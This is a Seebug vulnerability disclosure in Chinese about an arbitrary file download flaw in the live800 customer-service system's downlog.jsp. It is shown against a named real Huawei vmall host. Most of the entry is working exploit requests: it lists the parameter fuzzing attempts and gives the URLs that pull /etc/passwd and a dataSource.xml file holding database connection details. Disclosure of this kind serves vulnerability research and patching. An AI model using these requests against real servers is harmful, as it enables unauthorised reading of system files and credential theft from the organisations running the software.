live800客服系统任意文件下载漏洞

2015-10-17T00:00:00
ID SSV:95900
Type seebug
Reporter Root
Modified 2015-10-17T00:00:00

Description

简要描述:

偷闲发个漏洞,许多大厂商在,用危害挺大的。

详细说明:

在live800客服站点上fuzz出一个downlog.jsp文件 这里以 华为 为例:

http://robotim.vmall.com/live800/downlog.jsp

<img src="https://images.seebug.org/upload/201510/17011441b30d37acd06be31ff2f078c1077d148b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

根据提示猜测有可能是downlog.jsp没有接收到下载路径,于是继续fuzz参数:

downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd ……

最终fuzz到downlog.jsp?filepath=/&fileName=/etc/passwd成功下载文件。

http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd

<img src="https://images.seebug.org/upload/201510/170121542936117806674ceff9c9231e8269cd9a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

通过此漏洞下载dataSource.xml文件:

http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/home/---xxxx-xx-/live800/WEB-INF/conf/dataSource.xml

<img src="https://images.seebug.org/upload/201510/170127372641f110ccb8a21a0872adaf539a35bb.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

通过此文件能够下载服务器任意文件。 最终得到的downlog.jsp源码如下:

<img src="https://images.seebug.org/upload/201510/1701325308de1c9d2469097bf81270827686884c.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

同上 管理补充有效案例: